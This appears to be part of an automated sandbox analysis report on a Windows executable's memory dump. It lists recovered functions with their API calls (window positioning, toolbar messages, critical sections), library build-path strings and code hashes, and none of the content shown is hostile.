                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetMessagePos.USER32 ref: 0045334A
                                                                                                • IsWindow.USER32(?), ref: 0045336B
                                                                                                • SendMessageW.USER32(?,00000053,00000000,?), ref: 004533A1
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 0045337C
                                                                                                • @fO, xrefs: 00453386
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Message$SendWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 1876580345-3471680474
                                                                                                • Opcode ID: 9de0f7e4e472874569f48cc43f82cd737b4e77b6f564ec9c4c7ca6c94b7cd963
                                                                                                • Instruction ID: 2a269382804fb09703bc4004491871ff56062b17e2e2aa70e65e38a387c82c13
                                                                                                • Opcode Fuzzy Hash: 9de0f7e4e472874569f48cc43f82cd737b4e77b6f564ec9c4c7ca6c94b7cd963
                                                                                                • Instruction Fuzzy Hash: AC01B5716443019BF3209F249C0A77B77E8AF8475AF040A1EFD88A6281EBB5D644868A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • DeferWindowPos.USER32(?,8B000000,00000000,?,?,?,?,00000214), ref: 00445145
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,004E0C4E,000000FF), ref: 00445152
                                                                                                Strings
                                                                                                • AWL::CWindowGroupMover::DeferWindowPos, xrefs: 0044517B
                                                                                                • dwp != 0, xrefs: 00445176
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\windowgroupmoverawl.cpp, xrefs: 00445171
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DeferErrorLastWindow
                                                                                                • String ID: AWL::CWindowGroupMover::DeferWindowPos$d:\build\teamagent\_work\1\s\0\awl\src\windowgroupmoverawl.cpp$dwp != 0
                                                                                                • API String ID: 189640761-352502605
                                                                                                • Opcode ID: 2dce267dd2896e86730efcd3016ae09c025b9242c8e30b035154c7d16ee85014
                                                                                                • Instruction ID: eaf8f64602cf687ab142c6308c4e048f4851783328b9ed6c4201d81280f9a854
                                                                                                • Opcode Fuzzy Hash: 2dce267dd2896e86730efcd3016ae09c025b9242c8e30b035154c7d16ee85014
                                                                                                • Instruction Fuzzy Hash: 8B0126315007006BEF241754DC09B6F7F91EB98355F14852BF649922A2E735C860DB19
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • AdjustWindowRectEx.USER32(?,?,?,?), ref: 00431479
                                                                                                • GetLastError.KERNEL32(?,?,00431501,?,?,?), ref: 00431483
                                                                                                Strings
                                                                                                • AWL::AdjustWindowRectEx, xrefs: 004314AF
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp, xrefs: 004314A5
                                                                                                • ::AdjustWindowRectEx(&rect, style, hasMenu, exStyle) != 0, xrefs: 004314AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AdjustErrorLastRectWindow
                                                                                                • String ID: ::AdjustWindowRectEx(&rect, style, hasMenu, exStyle) != 0$AWL::AdjustWindowRectEx$d:\build\teamagent\_work\1\s\0\awl\src\windowawl.cpp
                                                                                                • API String ID: 3173749988-1721057301
                                                                                                • Opcode ID: 9712e94decfcbe06cae1dec9d3077b947e87f1b033db9db8b543b7a2078ae249
                                                                                                • Instruction ID: 09c92701890da81fb06eaa483bd191d90924247943ec914f86ce8622a75351dd
                                                                                                • Opcode Fuzzy Hash: 9712e94decfcbe06cae1dec9d3077b947e87f1b033db9db8b543b7a2078ae249
                                                                                                • Instruction Fuzzy Hash: B5F04C207002412BDB245B695C0597F67E5DF68381F14152FF944D12E2EA688CA0C399
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 004631F6
                                                                                                • SendMessageW.USER32(?,00000444,00000001,?), ref: 0046322D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-3237162522
                                                                                                • Opcode ID: bf2dddf415322787736f1842cb89dcf7f592c58df724fa0d92db6e2407007d65
                                                                                                • Instruction ID: 4cfe67188afd52d1109fe686135c1dea05031f7d960e3efdda00d542e89bab62
                                                                                                • Opcode Fuzzy Hash: bf2dddf415322787736f1842cb89dcf7f592c58df724fa0d92db6e2407007d65
                                                                                                • Instruction Fuzzy Hash: 29F06D3178071426FA302F645C17F3736589B50B12F00856BBE55EA6C1FAE9E920829E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • SaveDC.GDI32(?), ref: 0044B0FB
                                                                                                • GetLastError.KERNEL32(?,?,?,56EC75FF,0044F3C7,?,?,?,0045230D,?,0044F3C7,56EC75FF,?,?,?,?), ref: 0044B108
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\dcawl.cpp, xrefs: 0044B127
                                                                                                • AWL::CDCState::CDCState, xrefs: 0044B131
                                                                                                • savedState != 0, xrefs: 0044B12C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ErrorLastSave
                                                                                                • String ID: AWL::CDCState::CDCState$d:\build\teamagent\_work\1\s\0\awl\src\dcawl.cpp$savedState != 0
                                                                                                • API String ID: 962054050-666050908
                                                                                                • Opcode ID: 70ce0c152fa150e41a5923bac2e0e0db4a9416c2dcdbefa27ae68d4fb26e7ae1
                                                                                                • Instruction ID: 75243d3b358354862e22c4c595eba64e7ad19aab19dfb840516b7716b03a90bb
                                                                                                • Opcode Fuzzy Hash: 70ce0c152fa150e41a5923bac2e0e0db4a9416c2dcdbefa27ae68d4fb26e7ae1
                                                                                                • Instruction Fuzzy Hash: C4F090B17002014BEB245F68AC59A6B7799DB647C2B50843BF649C3782FB68DC20C7D9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0046326F
                                                                                                • SendMessageW.USER32(?,0000041F,00000000,?), ref: 004632B3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-3237162522
                                                                                                • Opcode ID: d1f94ae7a2adbd711a4ccaa32982700fcc2b1c9755505e51aa282407141b0149
                                                                                                • Instruction ID: 2894d46be60391fc0cc8aea51aa230c655e0b947fe474c578022d6cc7287450e
                                                                                                • Opcode Fuzzy Hash: d1f94ae7a2adbd711a4ccaa32982700fcc2b1c9755505e51aa282407141b0149
                                                                                                • Instruction Fuzzy Hash: 95F096707403206AF7242F255C17F7B35549B50F06F00842FBA45DA1C2F6F8C810829D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • BeginDeferWindowPos.USER32 ref: 0044502D
                                                                                                • GetLastError.KERNEL32(?,?,00000000,004E0C4E,000000FF,?,0042C190), ref: 0044503A
                                                                                                Strings
                                                                                                • AWL::CWindowGroupMover::CWindowGroupMover, xrefs: 00445063
                                                                                                • dwp != 0, xrefs: 0044505E
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\windowgroupmoverawl.cpp, xrefs: 00445059
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: BeginDeferErrorLastWindow
                                                                                                • String ID: AWL::CWindowGroupMover::CWindowGroupMover$d:\build\teamagent\_work\1\s\0\awl\src\windowgroupmoverawl.cpp$dwp != 0
                                                                                                • API String ID: 3690954099-1300398750
                                                                                                • Opcode ID: b87d034e7bc7577d59a298f34aedeab730382f0b8c8918de7126d8297fc9dce1
                                                                                                • Instruction ID: a852f6569aae9f9079a97ae8ddd922af7bb2ca8ff7b9d5b7282eb4a9338cfa36
                                                                                                • Opcode Fuzzy Hash: b87d034e7bc7577d59a298f34aedeab730382f0b8c8918de7126d8297fc9dce1
                                                                                                • Instruction Fuzzy Hash: 69F0B435700E015FEF206B685805A6F7691EB51746F84482BF984C3347F679CC90CBE9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 0046309F
                                                                                                • SendMessageW.USER32(00000000,00000440,?,?), ref: 004630D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-3237162522
                                                                                                • Opcode ID: f90499bbe00a67f555a14ca115f3ddb90a3a43d1f2a9582ca52ab913faf67065
                                                                                                • Instruction ID: 4d112ba7c4c37207ca13aa0d24e571cb63067a180ec1782f694ffbcb73b01fc8
                                                                                                • Opcode Fuzzy Hash: f90499bbe00a67f555a14ca115f3ddb90a3a43d1f2a9582ca52ab913faf67065
                                                                                                • Instruction Fuzzy Hash: B4F05E357803116BF6302F255D07F3B36989F50B05F01842FBA55EA2C6FABAD821868E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 0046311F
                                                                                                • SendMessageW.USER32(?,0000043F,?,?), ref: 00463159
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessageSendWindow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\inc\toolbarctrlawl.h
                                                                                                • API String ID: 701072176-3237162522
                                                                                                • Opcode ID: 56cf0155674a8b7405462f309e87e376af3dd0cb32f2d68308bfab6dfc01aa99
                                                                                                • Instruction ID: ec9cfa5a1750e25dbfa31fcd6d37f53541b699b7e0969ca9335439a10ba05e76
                                                                                                • Opcode Fuzzy Hash: 56cf0155674a8b7405462f309e87e376af3dd0cb32f2d68308bfab6dfc01aa99
                                                                                                • Instruction Fuzzy Hash: 47F0B43578031137E6202F245D03F7B31545F50B11F10852FB655EA1C1EAB9C820868E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0049F248
                                                                                                • InitializeCriticalSection.KERNEL32(00000000), ref: 0049F2B4
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0049F333
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\serverjobmanager.cpp, xrefs: 0049F273
                                                                                                • @fO, xrefs: 0049F27D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8InitializeThrow
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\serverjobmanager.cpp
                                                                                                • API String ID: 962660358-1838520060
                                                                                                • Opcode ID: 4d017e3a39d1ce0a91a7c77e6020adba354af77d614e45a28779428ba778aaf6
                                                                                                • Instruction ID: 8a33c9149e1e63dded4c87c18ef04a1ff9098ba55f6be26149de293a6a36771e
                                                                                                • Opcode Fuzzy Hash: 4d017e3a39d1ce0a91a7c77e6020adba354af77d614e45a28779428ba778aaf6
                                                                                                • Instruction Fuzzy Hash: 7431F670904384EFDB10DB69C805BAEBFB4AF19308F10416EE855E73C2C7B85A05C7AA
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,00000008,FFFFFFFF,005300CC,00001010), ref: 00480204
                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 0048020B
                                                                                                • EnterCriticalSection.KERNEL32(005300DC), ref: 0048024A
                                                                                                • LeaveCriticalSection.KERNEL32(005300DC), ref: 004802BA
                                                                                                  • Part of subcall function 0046C190: TlsGetValue.KERNEL32(74E070F0,000000FF,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1B2
                                                                                                  • Part of subcall function 0046C190: TlsSetValue.KERNEL32(0053011C,?,?,00491C3E,?,?,000000FF,74E070F0), ref: 0046C1D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalHeapSectionValue$AllocEnterLeaveProcess
                                                                                                • String ID: Ot Ut
                                                                                                • API String ID: 1770410967-2482394718
                                                                                                • Opcode ID: f2fdb786b2aee58788644f111a198332667dd3b10bb96c4f8251b7395c679c4c
                                                                                                • Instruction ID: 0ab391232264b13b9dd5b9330eb2f01e729ac023632dfe3c6cfccacdd3544ed7
                                                                                                • Opcode Fuzzy Hash: f2fdb786b2aee58788644f111a198332667dd3b10bb96c4f8251b7395c679c4c
                                                                                                • Instruction Fuzzy Hash: ED31AF70600244DFDB10DF68C988B6EBBF4EB48714F20456EE459D3391D7749E04CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0048F22B
                                                                                                • LeaveCriticalSection.KERNEL32(00000000), ref: 0048F2DB
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeaveValue$Exception@8Throw
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp
                                                                                                • API String ID: 944179621-4116104750
                                                                                                • Opcode ID: 925da8f9ead0182ccdf4756276c5628d61ae1ae1275047ac5450c5e84a71c2f2
                                                                                                • Instruction ID: 92e5a7b8fb3523b5ed1a80e13a6db1363d1d834ca2b971326f72f1e487a68998
                                                                                                • Opcode Fuzzy Hash: 925da8f9ead0182ccdf4756276c5628d61ae1ae1275047ac5450c5e84a71c2f2
                                                                                                • Instruction Fuzzy Hash: 8021F475A40648AFDB10EB24CC06FABB7A8EB50714F10466BEC14977C1E7B99908CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(005359BC), ref: 00438332
                                                                                                • LeaveCriticalSection.KERNEL32(005359BC,76919BB0), ref: 0043836F
                                                                                                  • Part of subcall function 00438980: InitializeCriticalSection.KERNEL32(005359BC,?,?,004DF381,000000FF), ref: 00438A12
                                                                                                  • Part of subcall function 004BA219: __onexit.LIBCMT ref: 004BA21F
                                                                                                • LeaveCriticalSection.KERNEL32(005359BC,76919BB0), ref: 004383C4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Leave$EnterInitialize__onexit
                                                                                                • String ID: hYS$lYS
                                                                                                • API String ID: 1177717561-2256657830
                                                                                                • Opcode ID: 6b61df5e19b3fd641566239dec5f201497604af2fa14282cae013d49a628eca4
                                                                                                • Instruction ID: 3c6cee23d4114472a34ab01d7309fc2eeb9bc11586a06a7400d19b45fcadd8a5
                                                                                                • Opcode Fuzzy Hash: 6b61df5e19b3fd641566239dec5f201497604af2fa14282cae013d49a628eca4
                                                                                                • Instruction Fuzzy Hash: CC31ABB1901745EBCB10DF98C94976DBBA0BB18738F14126EF824A33C0D7795A18CB96
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?,?,?,?,000000FF), ref: 004720DB
                                                                                                • LeaveCriticalSection.KERNEL32(00534CF0), ref: 00472142
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp$KS
                                                                                                • API String ID: 3168844106-1251496345
                                                                                                • Opcode ID: 83ec69f6c14fb1b078f5337a3bf254fc471a51f90783bc3d42d0165bd316bc48
                                                                                                • Instruction ID: 25d5a0242710a0943306ee20cdf426374eb83970b810a46245430036bd22018c
                                                                                                • Opcode Fuzzy Hash: 83ec69f6c14fb1b078f5337a3bf254fc471a51f90783bc3d42d0165bd316bc48
                                                                                                • Instruction Fuzzy Hash: 542129309042459FCB28CF6CDD05B6A7BB1FB65708F10815ED815573C2EBB96709CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InitializeCriticalSection.KERNEL32(005355DC,?,?,004E5ADF,000000FF), ref: 0048E2D9
                                                                                                • EnterCriticalSection.KERNEL32(005355DC,?,?,004E5ADF,000000FF), ref: 0048E382
                                                                                                • LeaveCriticalSection.KERNEL32(005355DC,?,?,004E5ADF,000000FF), ref: 0048E3CC
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp, xrefs: 0048E3A0
                                                                                                • @fO, xrefs: 0048E3AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterInitializeLeave
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\virtualfilesystem.cpp
                                                                                                • API String ID: 3991485460-200847071
                                                                                                • Opcode ID: d3281263f16ba0831ca3c7b56b289901838ba913e52eadbfca663d3c375c6dd7
                                                                                                • Instruction ID: 6383ab79d7d22fa7c315fe112cf89716ca68f462cc43fdbfa42b5667460ba13c
                                                                                                • Opcode Fuzzy Hash: d3281263f16ba0831ca3c7b56b289901838ba913e52eadbfca663d3c375c6dd7
                                                                                                • Instruction Fuzzy Hash: 7D31D470804BC8DAE701DF64D94A3AD7FF1BB65308F205259E844673E1E7F81688D755
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00534E70), ref: 004841A2
                                                                                                • LeaveCriticalSection.KERNEL32(00534E70,?,?,?,?,?,000000FF), ref: 0048421E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\privateallocators.cpp
                                                                                                • API String ID: 3168844106-3876554878
                                                                                                • Opcode ID: 5f88d24e55c6d2f71cbe92738e63192e8722145622e5ed12576c67c9f531eb22
                                                                                                • Instruction ID: e50858d49158e84b9da415036c78cfa5c03e971734f76145952b2bae321898fb
                                                                                                • Opcode Fuzzy Hash: 5f88d24e55c6d2f71cbe92738e63192e8722145622e5ed12576c67c9f531eb22
                                                                                                • Instruction Fuzzy Hash: 36113831980355ABE7209B188C0676FF7B4EB65B11F15466FF911A37C1C7F8950083D5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00535528,?), ref: 0048610A
                                                                                                • LeaveCriticalSection.KERNEL32(00535528,00000000), ref: 00486183
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
